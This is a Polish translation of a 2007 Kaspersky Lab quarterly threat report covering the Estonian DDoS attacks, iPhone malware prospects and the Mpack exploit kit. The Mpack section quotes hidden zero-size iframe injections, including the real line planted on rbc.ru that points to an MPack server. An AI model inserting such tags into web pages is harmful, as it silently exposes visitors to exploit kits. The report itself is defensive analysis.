Stan zagrożeń w internecie znajduje się obecnie na poziomie standardowym. Nie występują duże epidemie a eksperci z Kaspersky Lab nie zanotowali żadnych poważnych incydentów związanych z bezpieczeństwem. Poziom zagrożenia: 1

Ewolucja szkodliwego oprogramowania: kwiecień - czerwiec 2007


Alexander Gostev
Starszy analityk wirusów, Kaspersky Lab

Wstęp

Nasz najnowszy raport kwartalny jest prawdopodobnie najbardziej nietypowy ze wszystkich dotychczas opublikowanych. Wydarzenia, jakie miały miejsce w pierwszej połowie 2007 r., świadczą o tym, że sposoby rozprzestrzeniania zagrożeń ewoluują od stosowania socjotechniki do coraz powszechniejszego wykorzystywania różnego rodzaju luk w zabezpieczeniach.

"Kryzys koncepcji" obserwowany wśród twórców wirusów, o którym pisaliśmy pod koniec zeszłego roku (obawiając się, że w najbliższej przyszłości doprowadzi on do kryzysu) nadal trwa. Obecnie obserwujemy brak zupełnie nowych zagrożeń oraz coraz większą komercjalizację środowiska tworzenia wirusów. Jak już poprzednio stwierdziłem, piłeczka jest teraz po naszej stronie - po raz pierwszy od wielu lat firmy antywirusowe mają przewagę. Jedyną rzeczą, jaka interesuje twórców wirusów, jest zarabianie brudnych pieniędzy. Nie są zdolni do wymyślania nowych koncepcji, więc zamiast tego próbują "wycisnąć" co się da ze starych technologii, dzięki czemu branża antywirusowa znajduje się teraz w dobrej sytuacji. Najgorsze jest jednak to, że ponad jakość przedkłada się ilość. Ilość prymitywnych szkodliwych programów, które kradną co się da, ciągle rośnie, jednak sytuacja bardziej przypomina przepychankę niż wojnę "koncepcyjną".

W raporcie tym nie poświęcimy wiele miejsca szkodliwym programom. Będziemy analizować bezpieczeństwo informacji w szerszym ujęciu: przedstawimy informacje dotyczące problemów Internetu, nowych technologii i luk. Są to obszary, w obrębie których znajdują się dzisiaj kluczowe wyzwania, problemy, z którymi muszą się zmierzyć firmy antywirusowe.

Estonia

Wydarzenia, jakie miały miejsce pod koniec kwietnia i na początku maja, pozostaną prawdopodobnie tymi, które wywołały najwięcej dyskusji w 2007 r. Po raz pierwszy w historii politycy, przedstawiciele sił zbrojnych oraz eksperci komputerowi z całego świata podjęli ten wciąż wirtualny temat: cyberwojna.

Temat ten dotyczył Estonii, a dokładniej ataków na kilkadziesiąt serwerów w estońskim sektorze Internetu. Wszystko zaczęło się w połowie kwietnia, gdy estoński rząd postanowił usunąć z jednego z tallińskich placów pomnik ku czci radzieckich żołnierzy poległych w II Wojnie Światowej podczas wyzwalania Tallinna. Decyzja ta spotkała się z dużym sprzeciwem ze strony Rosji i doprowadziła do pogorszenia stosunków politycznych między tymi dwoma państwami.

Podobne napięcia w stosunkach między Rosją i byłymi republikami Związku Radzieckiego, które robiły wszystko co w ich mocy, aby odciąć się od radzieckiej przeszłości, miały miejsce już wcześniej. Incydent ten mógł pozostać jedynie sprawą w sferze dyplomatycznej, gdyby nie nałożyło się na to jeszcze kilka innych czynników, i nie wydarzyło się coś jeszcze.

27 kwietna estońskie strony internetowe prezydenta, premiera, parlamentu, policji oraz wielu ministrów uległy przeciążeniu z powodu ogromnej liczby żądań wysyłanych z tysięcy komputerów zlokalizowanych na całym świecie. Miało to miejsce wkrótce po tym, jak policja rozpędziła demonstrantów w Tallinnie, którzy protestowali przeciwko usunięciu pomnika. W starciu z policją ponad 600 osób zostało aresztowanych, a około stu odniosło obrażenia.

Niemal natychmiast nastąpił kontratak za pośrednictwem Internetu. Według badań przeprowadzonych przez ekspertów z fińskiej firmy F-Secure, 28 kwietnia całkowicie niedostępne były następujące strony internetowe:

  • www.peaminister.ee (strona internetowa premiera): niedostępna
  • www.mkm.ee (Ministerstwo Gospodarki i Komunikacji): niedostępna
  • www.sisemin.gov.ee (Ministerstwo Spraw Wewnętrznych): niedostępna
  • www.vm.ee (Ministerstwo Spraw Zewnętrznych): niedostępna
  • www.valitsus.ee (Rząd Estoński): niedostępna
  • www.riigikogu.ee (Parlament Estoński): niedostępna

Pierwszy atak trwał mniej więcej do 4 maja. Ofiarą ataku DDoS padło ponad dziesięć estońskich stron internetowych. Jednak wszyscy dobrze wiedzieli, że najgorsze miało dopiero nastąpić. Zbliżał się 9 maja, Dzień Zwycięstwa w Rosji.

Firma Arbor specjalizująca się w ochronie przed atakami DoS opublikowała własne statystyki dotyczące zdarzeń w Estonii. Interesujące jest to, że według jej raportu, ataki rozpoczęły się 3 maja, 2007 roku. Możliwe, że wtedy właśnie władze estońskie zwróciły się do firmy Arbor o pomoc, ponieważ nie ma żadnych danych odnośnie pierwszej fali ataków (od 27 kwietnia do 3 maja). Statystyki te można znaleźć tutaj: http://asert.arbornetworks.com/2007/05/estonian-ddos-attacks-a-summary-to-date:

Liczba ataków Data
21 2007-05-03
17 2007-05-04
31 2007-05-08
58 2007-05-09
1 2007-05-11

Jak widać, druga fala ataków rozpoczęła się 8 maja, osiągając punkt krytyczny 9 maja. W tym miejscu należy wyjaśnić, co oznacza w tym kontekście termin "atak". Jak podaje firma Arbor, w ciągu dwóch tygodni odnotowano 128 unikatowych ataków DDoS, z których 115 to typowe ataki ICMP-flood, 4 to ataki SYN, a pozostałe 9 to różne warianty ataków, których celem jest zwiększenie ruchu sieciowego.

Oczywiście to tylko niektóre z ataków, jakie miały miejsce. Przykłady te pokazują, na jak ogromną skalę zostały przeprowadzone. Ponadto, ogromna większość ataków trwała zaledwie godzinę lub krócej. Tylko 7 ataków utrzymało się przez 10 godzin.

Atak przeciwko Estonii przeprowadzono na kilku poziomach jednocześnie. Oprócz ataków DoS na kluczowe strony rządowe zmodyfikowano również dziesiątki innych estońskich stron internetowych. Większość z nich działa w oparciu o różne silniki skryptowe, które posiadają wiele różnych luk, od CSS/XSS po wstrzykiwanie SQL.

Technicznie ataki te nie były szczególnie skomplikowane i mogły zostać przeprowadzone w każdym innym czasie, jednak ostatnie zdarzenia przyciągnęły hakerów z całego świata, z których wielu wykorzystało sytuację do tego, aby podszkolić i zastosować w praktyce swoje umiejętności.

Jednym z pierwszych portali, na który włamano się, był portal internetowy Partii Reform, na czele której stoi premier Estonii Andrus Ansip. Tekst ze strony głównej zastąpiono rzekomymi przeprosinami zaadresowanymi do rosyjskojęzycznych mieszkańców Estonii. "Premier prosi o wybaczenie! Premier i rząd Estonii błaga o wybaczenie całą rosyjską ludność Estonii i zobowiązuje się przywrócić pomnik Brązowego Żołnierza na należne mu miejsce" - napisali hakerzy.

W międzyczasie ofiarą ataków padły również rosyjskie strony internetowe. "3 maja tego roku strona internetowa prezydenta Rosji padła ofiarą ataków hakerów, przeprowadzonych na bezprecedensową skalę z serwerów zlokalizowanych najprawdopodobniej w regionie nadbałtyckim" - poinformowała agencja informacyjna RIA Novosti, cytując jedno ze źródeł na Kremlu.

Jednak dzięki systemowi tworzenia kopii zapasowych oraz współczesnemu systemowi bezpieczeństwa strona internetowa prezydenta nie straciła kontroli. Źródło na Kremlu przyznało, że "wystąpiły pewne problemy", dodając , że "ataki hakerów na instytucje rządowe różnych państw są niestety na porządku dziennym."

Celem ataków stały się również rosyjskie media, takie jak radio Echo Moskwy oraz gazeta Kommersant. W przypadku niektórych z nich nie było żadnego związku między ich ofiarami a wydarzeniami w Estonii.

Sprawcami ataków na strony internetowe swoich bezpośrednich rosyjskich przeciwników byli prawdopodobnie estońscy hakerzy. 9 maja włamano się na stronę internetową obrońców pomnika. Strona główna nie zawierała już informacji organizacji "Straż Nocna" (web-dozor.ru) - zostały one zastąpione bannerem z hasłem: "Proud to be Estonian" oraz estońską flagą z napisem "Estonia Forever!" Poza tym hakerzy zaatakowali jeszcze co najmniej jedna stronę: 1-net.ru.

Jak widać na poniższych zrzutach ekranu, była to bezpośrednia wymiana "wirtualnych" ciosów:


(c) f-secure


(c) f-secure

Jak zareagowały na to władze estońskie? Najpierw estońska policja aresztowała 19-letniego mieszkańca Tallinna pod zarzutem przeprowadzenia cyberataków na rządowe strony internetowe. Później jednak sprawy przybrały zupełnie nieoczekiwany obrót. Estońscy politycy złamali niepisaną zasadę, oskarżając o zorganizowanie ataków rosyjskie służby specjalne - po raz pierwszy zostało użyte na tym szczeblu słowo "cyberwojna".

Nie jest dla nikogo tajemnicą, że najbardziej znaczące rządowe służby specjalne mają specjalne wydziały ds. bezpieczeństwa elektronicznych zasobów kraju i są uprawnione do podejmowania w tym celu odpowiednich działań. Nazywamy to "elektronicznym wywiadem". Podobne oddziały istnieją w amerykańskiej armii, a ich członkowie uczestniczyli nawet, chociaż bez większych sukcesów, w zawodach dla hakerów o to, któremu z nich uda się spenetrować zasoby internetowe.

Był to jednak pierwszy przypadek w historii, gdy jeden rząd oskarżył inny o przeprowadzenie cyberataku. Nie zdarzyło się to nawet w czasie konfliktu indyjsko-pakistańskiego, gdy pod koniec lat dziewięćdziesiątych hakerzy obu tych państw toczyli ze sobą wirtualną bitwę w Internecie. W tych okolicznościach pojawił się robak Lentin (Yaha) - jeden z najbardziej destrukcyjnych robaków pocztowych ostatniej dekady.

Nie miało to miejsca nawet po interwencji NATO w konflikt toczący się w Jugosławii i zbombardowaniu Serbii, gdy serbscy hakerzy stworzyli sojusz z hakerami z innych państw i zaatakowali zasoby sieciowe Stanów Zjednoczonych oraz NATO.

Podobne oskarżenia nie padły nawet podczas licznych zawirowań w stosunkach między Chinami i Japonią, gdy ofiarą ataków DoS padły japońskie internetowe strony rządowe.

Nie stało się to nawet wtedy, gdy departamenty i agencje amerykańskiego rządu stały się (i nadal są) celem ataków chińskich ugrupowań hakerów, które często zdobywają dostęp do tajnych informacji.

Wprawdzie ataki na estońskie strony internetowe były wyrazem zwykłego wandalizmu, jednak komuś wyraźnie zależało na tym, aby przenieść konflikt na nowy poziom. Najpierw, Urmas Paet, estoński Minister do Spraw Zagranicznych, oświadczył, że hakerzy działali w imieniu Rosji, wykorzystując między innymi komputery mieszczące się w instytucjach rządowych. Następnie, Yaak Aaviksoo, estoński Minister Obrony zaproponował, aby uznać te cyberataki za formę ataków zbrojnych. "Obecnie NATO nie uznaje cyberataków za ataki zbrojne. To oznacza, że w stosunku do państw należących do NATO, które padły ofiarą tych ataków, nie stosuje się automatycznie piątego artykułu Traktatu Północnoatlantyckiego mówiącego o zapewnieniu ochrony wojskowej. Żaden Minister Obrony NATO nie zaliczyłby dzisiaj cyberataków do ataków zbrojnych. Kwestią tą trzeba się jak najszybciej zająć".

Tak więc Estonia chciała, aby zapewniono jej obronę wojskową przed atakami z Internetu - sytuacja stawała się poważna. Przy tego rodzaju oświadczeniach niezbędne byłyby przynajmniej niepodważalne dowody udziału rosyjskiego rządu w incydencie. Estonia nie zdołała przedstawić takich dowodów przez kilka miesięcy po tym, jak rozpoczęły się ataki. Również eksperci z NATO nie zdołali niczego ustalić, gdy na początku maja pospieszyli do Tallinna, żeby "uratować swojego sojusznika". Zasadniczo, oskarżenia o udział rosyjskiego rządu w atakach opierały się na jedynie na fakcie, że strona internetowa prezydenta Estonii została odwiedzona z adresu IP, który "należy do pracownika administracji rosyjskiego prezydenta". Wiedza służb estońskich dotycząca właścicieli wszystkich rosyjskich adresów IP jest godna podziwu, podobnie jak ich wiedza na temat tego, jak "trudno" jest sfałszować taki adres.

Jednak cyberwojna została wypowiedziana. Nagle do Estonii zjechali się eksperci z całego świata - ze Stanów Zjednoczonych, Europy i Izraela. Niektórzy przybyli, aby pomóc w walce z zagrożeniem, inni po bezcenne doświadczenie - przyjrzenie się konfliktowi z bliska i wyciągnięcie z niego nauki, która mogłaby przyczynić się do zwiększenia bezpieczeństwa ich własnych krajów.

A co działo się w rosyjskim Internecie w tym czasie? Podczas gdy wszyscy zajęci byli oskarżaniem rosyjskich władz, nikt nie pomyślał o tym, aby zapytać rosyjskich internautów, co sadzą na temat incydentu z Brązowym Żołnierzem. Ich zdania były w przeważającej większości anty-estońskie i gdy tylko rozpoczęły się konflikty z policją, wielu rosyjskich internautów, którzy nie mogli zaprotestować osobiście, wyraziło swój sprzeciw online - w formie ataków DoS.

Trudno dziś określić, kiedy i gdzie narodził się pomysł przeprowadzenia ataków polegających na generowaniu wzmożonego ruchu. Jego autorami byli prawdopodobnie hakerzy z tej samej grupy, która w przeszłości przeprowadziła podobne ataki na strony internetowe czeczeńskich rebeliantów. Doświadczenie to okazało się cenne i zostało wykorzystane powtórnie. Różne programy, które w ogromnej ilości pojawiły się na forach i stronach internetowych, wysyłały liczne żądania do estońskich stron internetowych. Każdy mógł pobrać taki program i uruchomić go na swoim komputerze. Z technologicznego punktu widzenia mamy tu do czynienia z botnetem. Jest to jednak botnet dobrowolny i stworzony za zgodą właścicieli wykorzystywanych komputerów, którzy doskonale wiedzą, co robią i robią to całkowicie celowo. Przyglądając się danym statystycznym dotyczącym ataków zgromadzonych przez ekspertów z firmy Arbor, widzimy, że ogromna większość ataków trwała mniej niż godzinę. Czy można mieć pewność, że rosyjskie służby specjalne "wypożyczyły" od hakerów botnety na tak krótki czas?

Naturalnie, niektóre ataki zostały przeprowadzone z "prawdziwych" botnetów utworzonych z zainfekowanych wcześniej komputerów, nie znaczy to jednak, że należy umniejszać znaczenie "ręcznego" ataku. Jeśli chcemy już mówić o cyberwojnie, określenie partyzantka byłoby trafniejsze.

Warto dodać, że żadnej firmie antywirusowej nie udało się znaleźć szkodliwych programów, które zostały stworzone z myślą o przeprowadzeniu ataków na estońskie strony internetowe.

Ataki przeciwko Estonii ustały. Eksperci powrócili do swoich krajów, producenci sprzętu sieciowego zawarli nowe kontrakty, dziennikarze napisali dziesiątki artykułów na temat tego, co się wydarzyło. Koniec końców, pomnik został przeniesiony na nowe miejsce, a szczątki radzieckich żołnierzy ekshumowane. Dmitri, 19- latek z Tallinna, jedyny podejrzany w związku z atakami, został wypuszczony na wolność z powodu braku dowodów.

"Nie sądzę, aby była to Rosja, ale jak to udowodnić?" - pyta Gadi Evron, ekspert ds bezpieczeństwa IT z Izraela. Evron pojechał do Tallinna i przeprowadził dochodzenie post-mortem estońskiego systemu. "Internet sprzyja odpieraniu wszelkich zarzutów".

"Jeśli powstaną napięcia polityczne, z pewnością ich skutki ujrzymy w wirtualnych sieciach" - powiedział Evron w nawiązaniu do ataków na duńskie strony internetowe po tym, jak duńska gazeta opublikowała karykatury przedstawiające proroka Mohammeda.

Pokojowo nastawiona społeczność komputerowa bawi się teraz słowami "cyberwojna" i "cyberterroryzm", przyklejając Rosji etykietkę pierwszego państwa, które użyło "cyfrowej bomby". Eksperci tworzą scenariusze prawdziwych wojen komputerowych:

"Mówi się o ataku kaskadowym" - powiedział Mikhel Tammet, szef Departamentu ds komunikacji oraz IT działającego w ramach estońskiego Ministerstwa Obrony, o jednym z możliwych scenariuszy. "Najpierw, z powodu masowych wysyłek z botnetów, o których pisało poprzednio FBI, pojawią się trudności z uzyskaniem dostępu do popularnych internetowych portali informacyjnych. Później wystąpią zakłócenia w działaniu usług poczty elektronicznej, a hakerzy wykorzystają to jako przykrywkę do przeniknięcia do serwisów rządowych, firm z branży komunikacji, transportu oraz finansów, co mogłoby zdestabilizować funkcjonowanie systemu społecznego jako całości".

Podczas gdy wyszukiwarki i rządy na całym świecie wprowadzają różne ograniczenia dotyczące dostępu do informacji w Internecie zawierających instrukcje stworzenia bomby, kwestia cyberterroryzmu nie została dogłębnie przedyskutowana z uwzględnieniem obecnego stanu rzeczy. Eksperci z Kaspersky Lab zawsze byli zdania, że publikowanie informacji o różnych sposobach eliminowania istotnych funkcji danego celu jest bezwzględnie naganne. Nie ma wątpliwości, że wszelkie takie informacje mogłyby sprowokować pewne ekstremistyczne ugrupowania do podjęcia prób zrealizowania takiego scenariusza.

Puszka Pandory została otwarta. Pozostaje tylko pytanie, kto na tym zyska?

iPhone

Największym globalnym wydarzeniem w branży telefonii komórkowej w drugim kwartale 2007 r. - i prawdopodobnie w całym roku, było pojawienie się w sprzedaży iPhone'a firmy Apple.


Miliony amerykańskich użytkowników stały niecierpliwie w kolejce, czekając na rozpoczęcie sprzedaży, a wielu ustawiło się przed sklepem już kilka dni przed oficjalną datą sprzedaży. W międzyczasie, eksperci ds. bezpieczeństwa IT zastanawiali się nad tym, w jaki sposób iPhone zmieni krajobraz telefonii komórkowej oraz przeciętny poziom bezpieczeństwa telefonów. Czy jego ogromna popularność nie będzie przyczyną naruszenia stagnacji w świecie wirusów mobilnych?

Kaspersky Lab bacznie przygląda się mobilnym zagrożeniom. Dokładnie trzy lata temu jako pierwsi natknęliśmy się na wirusy mobilne.

Aby ocenić prawdopodobieństwo, z jakim szkodliwe programy będą tworzone dla różnych urządzeń i systemów operacyjnych, stosujemy system oparty na trzech kryteriach:

  1. Popularność systemu oraz zakres, w jakim jest on powszechnie wykorzystywany;
  2. Dokumentacja - dostępność różnego rodzaju kompletnej dokumentacji dotyczącej systemu;
  3. Bezpieczeństwo - brak zabezpieczeń systemu, ewentualnie znane luki w zabezpieczeniu systemu lub jego aplikacji.

Każde z tych kryteriów jest istotne. Jeśli zostaną spełnione wszystkie z nich, można z dużym prawdopodobieństwem oczekiwać pojawienia się szkodliwych programów dla danego systemu.

Spróbujmy zastosować te kryteria do iPhone'a.

Popularność

W ciągu pierwszych trzech dni od momentu pojawienia się iPhone'a w sprzedaży Apple sprzedał prawie pół miliona tych nowych urządzeń. W blogu na stronie egadgetmobile.com można było przeczytać, że w ciągu pierwszych dziesięciu dni lipca sprzedano ponad milion iPhone'ów. Analitycy spodziewają się, że w ciągu pierwszych 18 miesięcy sprzedaż sięgnie 13,5 milionów sztuk.

Czy liczby te wskazują na dużą popularność?

W 2003 roku na całym świecie sprzedano 6,7 milionów urządzeń przenośnych działających pod kontrolą systemu operacyjnego Symbian, a w grudniu 2003 r. sprzedano ponad milion smartfonów.

W 2004 roku, gdy pojawił się Cabir - pierwszy robak dla urządzeń przenośnych - było już 15 milionów telefonów pracujących pod kontrolą systemu Symbian, z których 70% było produktami firmy Nokia. W sumie, w 2004 roku Symbian posiadał 38% rynku smartfonów.

W drugim kwartale 2005 r. sprzedano 7,8 milionów telefonów (dla porównania w drugim kwartale 2004 r. sprzedano 2,4 mln.). Natomiast w pierwszej połowie 2005 r. sprzedano ogółem 14,5 milionów telefonów komórkowych działających pod kontrolą Symbiana.

Założenia, że do końca 2008 sprzedaż iPhone'ów sięgnie 13,5 milionów, opierają się na wysokości wpływów ze sprzedaży urządzeń z Symbianem - w 2004 r. sprzedano ich 15 milionów. Na podstawie tych liczb można stwierdzić, że w roku 2008 wirusy dla iPhone'a staną się rzeczywistością. Prawdopodobnie będzie to miało miejsce przed końcem roku dzięki dużemu zapotrzebowaniu użytkowników na tego typu urządzenia oraz intensywnej kampanii reklamowej.

Już teraz iPhone cieszy się popularnością, mimo że wyniki ze sprzedaży nie są jeszcze tak wysokie. Dane z analizy przeprowadzonej na dużą skalę przez pracowników Lightspeed Research tydzień po oficjalnej zapowiedzi przez programistów Apple długo oczekiwanego smartfonu pokazują, że jeden na trzech Amerykanów chce mieć iPhone'a. Około 8% respondentów planuje nabyć ten telefon w ciągu następnych 3 miesięcy, a 22% zamierza kupić iPhone "kiedyś w przyszłości".

Należy jednak uwzględnić jeszcze dwa kryteria.

Dokumentacja

Apple ogłosił, że iPhone działa pod kontrolą specjalnej wersji systemu Mac OS X. Oficjalnie nie wyjaśniono jeszcze, w jaki sposób system operacyjny dla urządzeń przenośnych różni się od wersji dla komputerów firmy Apple, jednak różnice są prawdopodobnie niewielkie. Zwykle wymaga to zoptymalizowania wersji, tak aby mogła być użytkowana bez pomocy klawiatury i myszy oraz dodatkowych aplikacji. Wewnętrzny system operacyjny określany jest jako "OS X 1.0 (1A543a)."

Procesor iPhone'a zbudowany jest w oparciu o architekturę ARM, co oznacza, że mogą działać na nim aplikacje napisane przy pomocy assemblera ARM, dla którego dostępna jest bardzo dobra i szczegółowa dokumentację.

Tak więc kryterium "dokumentacja" również jest spełnione.

Bezpieczeństwo

Istnieje jeszcze jedno kryterium, najprawdopodobniej najważniejsze ze wszystkich trzech: poziom bezpieczeństwa (lub jego brak) oraz obecność luk.

Ogólnie, Apple, a w szczególności system operacyjny i aplikacje Apple'a, nie wypadają najlepiej, jeżeli chodzi o problem luk. Luki istnieją i wiele z nich jest krytycznych. Ich wykrycie zawdzięczamy w dużej mierze nowej fali użytkowników-entuzjastów systemu Mac OS i wzrostowi jego popularności. To spowodowało, że hakerzy zaczęli "kopać głębiej". Już wcześniej pojawiły się robaki sieciowe dla systemu Mac OS X, które w celu rozprzestrzeniania się wykorzystują luki w zabezpieczeniach. Nie ma powodu przypuszczać, że takie same problemy nie będą dotyczyły systemu operacyjnego iPhone'a.

Na początku czerwca eksperci z SPI Dynamics poinformowali o pierwszej luce w zabezpieczeniach iPhone'a, która dotyczyła systemu wybierania numerów wykorzystującego specjalne, zautomatyzowane rozwiązania wbudowane w przeglądarkę Safari. W pewnych okolicznościach szkodliwy użytkownik mógłby przekierować rozmowy z numeru właściciela telefonu na inny numer, wykonywać rozmowy telefoniczne bez wiedzy użytkownika, uniemożliwiać wykonywanie połączeń i inicjować niekończący się cykl wybierania numeru, który można zatrzymać tylko przez wyłączenie i ponowne włączenie urządzenia.

Teoretycznie istnieje kilka sposobów przeprowadzenia ataku, jak można przeczytać na stronie internetowej SPI Dynamics. Szkodliwi użytkownicy mogą próbować zwabić potencjalną ofiarę na zainfekowaną stronę internetową. Ewentualnie, atak mógłby zostać zainicjowany przez wykorzystanie legalnych zasobów internetowych podatnych na ataki CSS (skrypty Cross-Site).

"Ponieważ luka ta może zostać uruchomiona ze stron internetowych, problem ten może dotknąć każdego, kto posiada iPhone'a" - powiedział Bill Hoffman, analityk z firmy SPI. To oznacza, że mamy do czynienia z poważną luką.

iPhone posiada wiele charakterystycznych cech, które mogą skomplikować życie twórcom wirusów. Po pierwsze, może wykorzystywać Bluetootha tylko w celu połączenia się z urządzeniami w technologii Bluetooth. Bluetooth nie może być używany do przesyłania plików lub synchronizowania telefonu z komputerem osobistym. Właściwość ta stawia pod znakiem zapytania możliwość istnienia robaków takich jak Cabir (które atakują system Symbian). Brak możliwości przesyłania plików za pośrednictwem Bluetootha z pewnością pozbawi przyszłe robaki ich najważniejszego sposobu rozprzestrzeniania się.

Drugim ograniczeniem jest... brak możliwości wysyłania MMS-ów! Funkcja ta, (a konkretnie jej brak) wywołała sporo krytyki ze strony użytkowników, jednak dla wirusów oznacza to to samo, co dla robaków oznacza brak możliwości przesyłania plików za pomocą Bluetootha. Jeśli wykluczymy MMS-y, odpadnie druga najbardziej popularna metoda rozprzestrzeniania mobilnych szkodliwych programów. Dlatego ComWar, robak atakujący system Symbian, prawdopodobnie nie przedostanie się do iPhone'a.

Bez wątpienia są to jedne z głównych ograniczeń. Najbardziej interesujące jest jednak to, że nie są one wynikiem zbadania przez firmę Apple potencjalnych problemów z robakami mobilnymi lub jej decyzji zwiększenia bezpieczeństwa urządzenia.

Biorąc pod uwagę powyższe, można wysunąć wniosek, że szkodliwe programy dla iPhone'a mogą zacząć pojawiać się w następnym roku, jednak prawdopodobnie nie będą to robaki. Najprawdopodobniej będą to typowe wirusy plikowe oraz różne trojany. Największym zagrożeniem dla użytkowników iPhone'a będą różne luki w zabezpieczeniach, które mogą być wykorzystane przez szkodliwych użytkowników w celu uzyskania dostępu do informacji przechowywanych w telefonie.

Mpack

W połowie czerwca media z branży bezpieczeństwa IT zostały zbombardowane doniesieniami z Włoch. Okazało się, że kilka tysięcy włoskich stron internetowych stanowi źródło rozprzestrzeniania się szkodliwych programów. W ciągu kilku dni na ponad sześciu tysiącach serwerów znaleziono strony zawierające kilka linijek kodu HTML, który nie został dodany przez ich właścicieli. Kod wyglądał mniej więcej tak (istnieje wiele wariantów, w których rozmiar pływającej ramki (szerokość/wysokość) został przedstawiony jako zero, jeden itd.):

< iframe src=address’ width=5 height=5 > < /iframe >

Eksperci z firmy Kaspersky Lab wiedzieli o tych ciągach już od kilku lat. Są to typowe konstrukcje stosowane w celu wykorzystania luk w zabezpieczeniach przeglądarek. Strona internetowa wskazana w polu "adres" pełni funkcję przekierowania do następnej strony zawierającej exploit lub sama w sobie jest odpowiedzialna za przeprowadzenie infekcji.

Znacznik

< iframe >
od dawna stanowi jedną z najczęściej stosowanych w takich przypadkach technik. Otwiera on nowe okno przeglądarki, a gdy rozmiar okna jest ustawiony na zero, użytkownik może go nie zauważyć. W rezultacie, exploit może zostać wykorzystany niepostrzeżenie, a użytkownik nie będzie nawet podejrzewał, że odwiedza jakąś inną stronę oprócz tej w oknie głównym.

Poniżej przedstawiamy kilka przykładów:

We wrześniu 2006 roku analitycy z firmy Kaspersky Lab otrzymali raport o dziwnym zachowaniu przeglądarki internetowej podczas otwierania przez użytkowników stron top.rbc.ru: Internet Explorer, nawet całkowicie załatany, załamywał się, natomiast Firefox działał, pochłaniał jednak około 400 MB pamięci RAM.

Analizując te strony, eksperci z firmy Kaspersky Lab znaleźli kod w odnośniku prowadzący do strony zarejestrowanej w domenie pp.se. Przy użyciu tego odnośnika znaleziono skrypt wykorzystujący lukę opisaną w biuletynie Microsoft Security Advisory (926043)

Exploit pobierał najnowszą wersję trojana Trojan-PSW.Win32.LdPinch - ayj.

W grudniu 2006 r. eksperci z firmy Kaspersky Lab znaleźli co najmniej 470 serwerów zainfekowanych trojanem Trojan-Downloader.JS.Psyme, z których wszystkie wykorzystywały usługi firmy hostingowej Valuehost. Jednym z zainfekowanych zasobów okazał się popularny serwis www.5757.ru.

Gdy użytkownicy Internetu odwiedzali zainfekowane witryny, skrypt, który został wbudowany w stronę przez szkodliwych użytkowników, zaczynał pobierać trojana Trojan-Downloader.JS.Psyme.ct, który pobierał następnie inne szkodliwe programy na zaatakowany komputer.

Jak widać, mamy już sporo doświadczenia w zwalczaniu tego rodzaju exploitów.

Kilka dni przed tym, jak wystąpiły problemy we Włoszech, odnotowaliśmy podobny incydent w Rosji, również tym razem dotyczył on popularnej strony internetowej RBC.ru.

7 czerwca 2007 r. wielu użytkowników, którzy odwiedzili rbc.ru ujrzało ostrzeżenie antywirusowe informujące o próbie zainfekowania systemu przez trojana. Szczegółowa analiza wykazała, że strona główna zawierała następujący kod:

 < iframe src="https://81.95.150.42/MPack091cbt/index.php" width=0 height=0 >< /iframe >  

Byliśmy zaskoczeni, że Mpack zdołał przedostać się poza granice Rosji i był wykorzystywany we Włoszech. Oto dlaczego:

  • Mpack został stworzony w Rosji. Rosyjscy hakerzy sprzedali go innym rosyjskim hakerom.
  • Jego autorzy to osoby, które aktywnie uczestniczyły w tworzeniu i wspieraniu innego rozpowszechnionego trojana, LdPinch.
  • Na czarnym rynku znajduje się kilka podobnych exploitów: Q406 Roll-up package, MDAC, WebAttacker itd. Wszystkie z nich są o wiele "skuteczniejsze" niż Mpack.

Przeanalizujmy, co się dzieje i w jaki sposób.

Istnieje kolekcja exploitów, które zostały napisane w PHP (lub innym języku skryptowym, takim jak VBS czy JS).

Kolekcja ta zawiera kilka exploitów, które wykorzystują luki w zabezpieczeniach popularnych przeglądarek oraz systemów operacyjnych. Najprostsza kolekcja może zawierać następujące exploity:

  • MS06-014 dla Internet Explorera 6
  • MS06-006 dla Firefoxa 1.5
  • MS06-006 dla Opery 7
  • WMF Overflow
  • QuickTime Overflow
  • WinZip Overflow
  • VML Overflow

Exploity te są zazwyczaj zaszyfrowane w celu obejścia programów antywirusowych oraz utrudnienia ich wykrycia i analizy.

Szkodliwi użytkownicy umieszczają na swoich witrynach gotowy zestaw exploitów i próbują nakłonić użytkowników do ich odwiedzenia. Do tego celu wykorzystywane są inne witryny. Szkodliwy użytkownik uzyska dostęp do innych witryn, zazwyczaj poprzez wykorzystanie kont dostępu skradzionych wcześniej przez trojana, takiego jak LdPinch.

Następnie do wszystkich podstron tych witryn zostanie dodany "złośliwy" znacznik ramki pływającej, prowadzący do strony z exploitami. Aby dodać znacznik pływającej ramki do większej liczby witryn internetowych, szkodliwy użytkownik może wykorzystać inne programy, takie jak FTPToolz, który został stworzony przez innego rosyjskiego ucznia.

Internauci wchodzący na strony, które zwykle odwiedzają, nie podejrzewają nawet, że włamali się na nie hakerzy, a ich przeglądarki atakowane są przez wiele różnych exploitów.

Jednak uruchomienie exploitów nie jest ostatecznym celem szkodliwych użytkowników, którzy tak naprawdę dążą do zainstalowania na zaatakowanych komputerach szkodliwych programów. Zwykle wymaga to zainstalowania trojana downloadera. W efekcie szkodliwi użytkownicy mogą zainstalować na zaatakowanych komputerach wirusy, robaki, backdoory, spyware itd.

Wszystkie podobne zestawy exploitów posiadają moduły odpowiedzialne za gromadzenie statystyk i szkodliwi użytkownicy mają dostęp do informacji dotyczących tego, ilu użytkowników zostało zainfekowanych, gdzie są zlokalizowani, jakiej używają przeglądarki, oraz na które strony "złapały się" ofiary.

Autorzy Mpacka sprzedawali program za 1 000 dolarów, oddzielnie oferując dalsze wsparcie (dodawanie nowych exploitów do kolekcji). Dokładnie w ten sam sposób sprzedawane są inne popularne, wymienione wcześniej kolekcje exploitów.

Jednym ze sposobów pomiaru skuteczności kolekcji exploitów jest współczynnik infekcji wśród użytkowników, którzy odwiedzają zainfekowaną stronę. Autorzy obiecują 30 - 50% współczynnik skuteczności, jednak praktyka pokazuje, że nie przekracza on zwykle10 - 12%. Współczynnik ten nadal stanowi powód do niepokoju, zważywszy na to, że strona jest odwiedzana przez tysiące użytkowników.

